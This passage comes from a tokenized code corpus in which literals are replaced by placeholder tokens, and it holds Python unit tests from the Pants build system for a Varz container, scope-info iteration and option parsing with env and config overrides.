'<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> varz = self . Varz ( { '<STR_LIT>' : resolvable_value } ) <EOL> self . assertEqual ( { '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } , varz . varz ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , varz . varz [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) <EOL> def test_mixed ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : resolvable_value } ) <EOL> self . assertEqual ( <NUM_LIT:0> , resolvable_value . resolutions ) <EOL> self . assertEqual ( { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } , <EOL> varz . varz ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , varz . varz [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) <EOL> def test_type_mismatch_container ( self ) : <EOL> with self . assertRaises ( TypeError ) : <EOL> self . Varz ( [ <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> ] ) <EOL> def test_type_mismatch_value ( self ) : <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> self . Varz ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : False } ) <EOL> def test_type_mismatch_resolvable ( self ) : <EOL> resolvable_item = CountingResolvable ( '<STR_LIT>' , True ) <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : resolvable_item } ) <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> varz . varz <EOL> def test_single_assignment ( self ) : <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> with self . assertRaises ( MutationError ) : <EOL> varz . varz = { '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import unittest <EOL> from pants . help . scope_info_iterator import ScopeInfoIterator <EOL> from pants . option . arg_splitter import GLOBAL_SCOPE <EOL> from pants . option . global_options import GlobalOptionsRegistrar <EOL> from pants . option . scope import ScopeInfo <EOL> from pants . subsystem . subsystem import Subsystem <EOL> from pants . subsystem . subsystem_client_mixin import SubsystemDependency <EOL> from pants . task . task import Task <EOL> class ScopeInfoIteratorTest ( unittest . TestCase ) : <EOL> def test_iteration ( self ) : <EOL> self . maxDiff = None <EOL> class Subsys1 ( Subsystem ) : <EOL> options_scope = '<STR_LIT>' <EOL> class Subsys2 ( Subsystem ) : <EOL> options_scope = '<STR_LIT>' <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return ( SubsystemDependency ( Subsys1 , '<STR_LIT>' ) , ) <EOL> class Goal1Task2 ( Task ) : <EOL> options_scope = '<STR_LIT>' <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return ( SubsystemDependency ( Subsys1 , '<STR_LIT>' ) , ) <EOL> @ classmethod <EOL> def task_subsystems ( cls ) : <EOL> return tuple ( ) <EOL> infos = [ <EOL> ScopeInfo ( GLOBAL_SCOPE , ScopeInfo . GLOBAL , GlobalOptionsRegistrar ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . SUBSYSTEM , Subsys2 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . SUBSYSTEM , Subsys1 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . INTERMEDIATE ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK , Goal1Task2 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . SUBSYSTEM , Subsys1 ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . INTERMEDIATE ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . INTERMEDIATE ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ScopeInfo ( '<STR_LIT>' , ScopeInfo . TASK ) , <EOL> ] <EOL> scope_to_infos = dict ( ( x . scope , x ) for x in infos ) <EOL> it = ScopeInfoIterator ( scope_to_infos ) <EOL> actual = list ( it . iterate ( [ GLOBAL_SCOPE , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> expected_scopes = [ <EOL> GLOBAL_SCOPE , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> expected_scope_infos = [ scope_to_infos [ x ] for x in expected_scopes ] <EOL> self . assertEquals ( expected_scope_infos , actual ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import shlex <EOL> import tempfile <EOL> import unittest <EOL> import warnings <EOL> from contextlib import contextmanager <EOL> from textwrap import dedent <EOL> from pants . base . deprecated import CodeRemovedError <EOL> from pants . option . arg_splitter import GLOBAL_SCOPE <EOL> from pants . option . config import Config <EOL> from pants . option . custom_types import file_option , target_option <EOL> from pants . option . errors import ( BooleanOptionNameWithNo , FrozenRegistration , ImplicitValIsNone , <EOL> InvalidKwarg , InvalidMemberType , MemberTypeNotAllowed , <EOL> NoOptionNames , OptionAlreadyRegistered , OptionNameDash , <EOL> OptionNameDoubleDash , ParseError , RecursiveSubsystemOption , <EOL> Shadowing ) <EOL> from pants . option . global_options import GlobalOptionsRegistrar <EOL> from pants . option . option_tracker import OptionTracker <EOL> from pants . option . options import Options <EOL> from pants . option . options_bootstrapper import OptionsBootstrapper <EOL> from pants . option . parser import Parser <EOL> from pants . option . ranked_value import RankedValue <EOL> from pants . option . scope import ScopeInfo <EOL> from pants . util . contextutil import temporary_file , temporary_file_path <EOL> from pants . util . dirutil import safe_mkdtemp <EOL> def task ( scope ) : <EOL> return ScopeInfo ( scope , ScopeInfo . TASK ) <EOL> def intermediate ( scope ) : <EOL> return ScopeInfo ( scope , ScopeInfo . INTERMEDIATE ) <EOL> def subsystem ( scope ) : <EOL> return ScopeInfo ( scope , ScopeInfo . SUBSYSTEM ) <EOL> class OptionsTest ( unittest . TestCase ) : <EOL> _known_scope_infos = [ intermediate ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> intermediate ( '<STR_LIT>' ) , <EOL> intermediate ( '<STR_LIT:test>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) , <EOL> task ( '<STR_LIT>' ) ] <EOL> def _register ( self , options ) : <EOL> def register_global ( * args , ** kwargs ) : <EOL> options . register ( GLOBAL_SCOPE , * args , ** kwargs ) <EOL> register_global ( '<STR_LIT>' , '<STR_LIT>' , type = bool , help = '<STR_LIT>' , recursive = True ) <EOL> register_global ( '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT> , recursive = True , fingerprint = True ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = int ) <EOL> register_global ( '<STR_LIT>' , type = list ) <EOL> register_global ( '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = bool , fingerprint = True ) <EOL> register_global ( '<STR_LIT>' , type = bool , implicit_value = False ) <EOL> register_global ( '<STR_LIT>' , type = bool , default = True ) <EOL> register_global ( '<STR_LIT>' , type = bool , default = False ) <EOL> register_global ( '<STR_LIT>' , type = bool , implicit_value = False , default = False ) <EOL> register_global ( '<STR_LIT>' , type = bool , implicit_value = False , default = True ) <EOL> register_global ( '<STR_LIT>' , choices = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) <EOL> register_global ( '<STR_LIT>' , choices = [ <NUM_LIT> , <NUM_LIT> ] , type = list , member_type = int ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = int , default = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = dict , default = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = dict , <EOL> default = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = target_option , default = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = target_option , <EOL> default = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> register_global ( '<STR_LIT>' , type = file_option , default = None ) <EOL> register_global ( '<STR_LIT>' , type = list , member_type = file_option ) <EOL> register_global ( '<STR_LIT>' , default = '<STR_LIT:default>' , implicit_value = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = int , recursive = True ) <EOL> register_global ( '<STR_LIT>' , type = int , recursive = True ) <EOL> register_global ( '<STR_LIT>' , removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , type = bool , removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> register_global ( '<STR_LIT>' , removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = int , recursive = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , <EOL> removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = bool , <EOL> removal_version = '<STR_LIT>' , <EOL> removal_hint = '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , fingerprint = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , fromfile = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = int , fromfile = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = dict , fromfile = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = list , fromfile = True ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , type = list , member_type = int , fromfile = True ) <EOL> def _create_config ( self , config ) : <EOL> with open ( os . path . join ( safe_mkdtemp ( ) , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fp : <EOL> for section , options in config . items ( ) : <EOL> fp . write ( '<STR_LIT>' . format ( section ) ) <EOL> for key , value in options . items ( ) : <EOL> fp . write ( '<STR_LIT>' . format ( key , value ) ) <EOL> return Config . load ( configpaths = [ fp . name ] ) <EOL> def _parse ( self , args_str , env = None , config = None , bootstrap_option_values = None ) : <EOL> args = shlex . split ( str ( args_str ) ) <EOL> options = Options . create ( env = env or { } , <EOL> config = self . _create_config ( config or { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = args , <EOL> bootstrap_option_values = bootstrap_option_values , <EOL> option_tracker = OptionTracker ( ) ) <EOL> self . _register ( options ) <EOL> return options <EOL> def test_env_type_int ( self ) : <EOL> options = Options . create ( env = { '<STR_LIT>' : "<STR_LIT>" } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = shlex . split ( '<STR_LIT>' ) , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' , type = list , member_type = int ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT> ] , options . for_global_scope ( ) . foo_bar ) <EOL> options = Options . create ( env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = shlex . split ( '<STR_LIT>' ) , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' , type = int ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . foo_bar ) <EOL> def test_arg_scoping ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , options . target_specs ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> with self . assertRaises ( ParseError ) : <EOL> self . _parse ( '<STR_LIT>' ) . for_global_scope ( ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> self . assertEqual ( True , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> self . assertEqual ( False , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( True , options . for_global_scope ( ) . verbose ) <EOL> self . assertEqual ( False , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> self . assertEqual ( True , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> self . assertEqual ( True , options . for_scope ( '<STR_LIT:test>' ) . verbose ) <EOL> self . assertEqual ( False , options . for_scope ( '<STR_LIT>' ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT:y>' : [ '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> self . assertEqual ( [ <NUM_LIT> , - <NUM_LIT> ] , options . for_global_scope ( ) . y ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { '<STR_LIT>' : { '<STR_LIT:y>' : [ '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> self . assertEqual ( [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:5> , - <NUM_LIT:6> , <NUM_LIT> ] , options . for_global_scope ( ) . y ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ ] , options . for_global_scope ( ) . y ) <EOL> options = self . _parse ( '<STR_LIT>' , env = { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , options . for_global_scope ( ) . config_override ) <EOL> options = self . _parse ( '<STR_LIT>' , env = { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , options . for_global_scope ( ) . config_override ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . assertEqual ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , options . for_global_scope ( ) . listy ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT:c>' : '<STR_LIT:d>' } , options . for_global_scope ( ) . dicty ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ { '<STR_LIT:c>' : '<STR_LIT:d>' } , { '<STR_LIT:e>' : '<STR_LIT:f>' } ] , options . for_global_scope ( ) . dict_listy ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . targety ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . targety ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , options . for_global_scope ( ) . target_listy ) <EOL> with temporary_file_path ( ) as fp : <EOL> options = self . _parse ( '<STR_LIT>' . format ( fp ) ) <EOL> self . assertEqual ( fp , options . for_global_scope ( ) . filey ) <EOL> with temporary_file_path ( ) as fp1 : <EOL> with temporary_file_path ( ) as fp2 : <EOL> options = self . _parse ( '<STR_LIT>' . format ( fp1 , fp2 ) ) <EOL> self . assertEqual ( [ fp1 , fp2 ] , options . for_global_scope ( ) . file_listy ) <EOL> def test_explicit_boolean_values ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . verbose ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . verbose ) <EOL> def test_boolean_defaults ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_set_option ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_negate_option ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_config_override_true ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } } ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_config_override_false ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } } ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_true_def_true_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_false_flag ) <EOL> self . assertFalse ( options . for_global_scope ( ) . store_false_def_true_flag ) <EOL> def test_boolean_invalid_value ( self ) : <EOL> with self . assertRaises ( Parser . BooleanConversionError ) : <EOL> self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:11> , <EOL> } } ) . for_global_scope ( ) <EOL> with self . assertRaises ( Parser . BooleanConversionError ) : <EOL> self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> } } ) . for_global_scope ( ) <EOL> def test_list_option ( self ) : <EOL> def check ( expected , args_str , env = None , config = None ) : <EOL> options = self . _parse ( args_str = args_str , env = env , config = config ) <EOL> self . assertEqual ( expected , options . for_global_scope ( ) . listy ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:4> , <NUM_LIT:5> ] , '<STR_LIT>' ) <EOL> check ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ <NUM_LIT:8> , <NUM_LIT:9> ] , '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_dict_list_option ( self ) : <EOL> def check ( expected , args_str , env = None , config = None ) : <EOL> options = self . _parse ( args_str = args_str , env = env , config = config ) <EOL> self . assertEqual ( expected , options . for_global_scope ( ) . dict_listy ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } ] , '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } , { '<STR_LIT:c>' : <NUM_LIT:3> } , { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ { '<STR_LIT:d>' : <NUM_LIT:4> , '<STR_LIT:e>' : <NUM_LIT:5> } , { '<STR_LIT:f>' : <NUM_LIT:6> } ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_target_list_option ( self ) : <EOL> def check ( expected , args_str , env = None , config = None ) : <EOL> options = self . _parse ( args_str = args_str , env = env , config = config ) <EOL> self . assertEqual ( expected , options . for_global_scope ( ) . target_listy ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> check ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_defaults ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT:test>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> options = self . _parse ( 